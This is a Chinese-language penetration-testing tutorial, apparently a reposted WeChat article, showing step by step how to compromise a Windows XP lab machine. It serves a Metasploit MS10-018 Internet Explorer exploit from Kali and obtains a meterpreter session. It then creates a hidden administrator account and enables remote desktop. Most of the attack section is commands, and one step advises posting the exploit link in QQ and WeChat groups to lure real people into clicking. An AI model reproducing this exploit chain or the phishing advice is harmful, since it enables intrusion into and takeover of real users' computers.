渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

admin 2025年3月24日15:58:24评论14 views字数 1472阅读4分54秒阅读模式
点击上方蓝色文字关注↑↑↑↑↑

安全君呀设为"星标⭐️"

第一时间收到文章更新

声明: 安全君呀 公众号文章中的技术只做研究之用,禁止用来从事非法用途,如有使用文章中的技术从事非法活动,一切后果由使用者自负,与本公众号无关。

文章声明:本篇文章内容部分选取网络,如有侵权,请告知删除。

学习传送阵: 老男孩老师微信 oldboylinux

Part.01
项目环境

攻击主机:kali

受害靶机:winxp

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
Part.02
渗透目标
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

利用钓鱼木马,通过xp的浏览器漏洞,入侵xp,并控制靶机主机。

通过生成本地木马,把木马种到靶机上,达到让用户无感知的可视化控制靶机主机的目的(不用远 程桌面工具实现控制)

Part.03
开始攻击渗透

 1)打开前面安装的kali服务器,并登录 kali 攻击机,进入终端环境,看能否Ping通xp靶机IP**

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

如果ping通了,攻击机到靶机xp环境是通的。

2)登录kali,执行msfconsole命令.

msfconsole
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

3)执行search ms10-018搜索攻击模块(浏览器漏洞攻击),并use 0到指定模块下。

search ms10-018
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

4)设置攻击者指定的服务器IP(此处设置kali的服务器地址)

###10.0.0.163是攻击者指定的存放木马的服务器,一般是公网服务器,

##不一定是kali,只要是存放木马的公网服务器就可以,这里用kali代替。

msf6 exploit(windows/browser/ms10_018_ie_behaviors) > set srvhost 10.0.0.163 srvhost => 10.0.0.163

##设置一个payload正向连接shell:

(windows/browser/ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/bind_tcp

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

5)执行run生成url地址,这个地址就是要通过社工等方法让目标机进行访问,从而获取对方权限的。

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

如何钓鱼? 把 http://10.0.0.163:8080/ZP8ghDdFo0Ju地址发到各个QQ群,微信群,诱骗别人点击,如果点击的人的浏览器有漏洞就会中木马。

6)复制自己生成的木马地址,模拟在自己的XP靶机浏览器里打开点击。

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

7)这时kali的msfconsole中就出自动现了successfully字样信息,此时按回车(如果此时在靶机访问IE 跳出OD,就把靶机里面OD删掉即可)。

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

8)执行sessions -i 1(i就是in进入的意思,1就是会话的ID)进入这个会话。

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

 9) 验证控制效果

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

10)在靶机创建用户,提升管理员权限。

##查看默认用户

C:WINDOWSsystem32>net user

##添加oldgirl用户 密码123

C:WINDOWSsystem32> net user admin1 123 /add

##将admin1用户加入到管理员组。

C:WINDOWSsystem32> net localgroup administrators admin1 /add

11) 退出靶机并激活远程桌面。

C:WINDOWSsystem32>exit

exit

##激活靶机远程桌面功能

meterpreter > run post/windows/manage/enable_rdp

12)通过执行mstsc打开远程桌面工具,进行远程连接控制靶机。

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

Tips

欢迎大家在下面点赞评论加关注,让我们一起在网安之路越走越远!!!

长按扫描下方二维码加关注,了解更多网安知识哦!

渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
END

原文始发于微信公众号(安全君呀):渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月24日15:58:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机https://cn-sec.com/archives/3878637.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息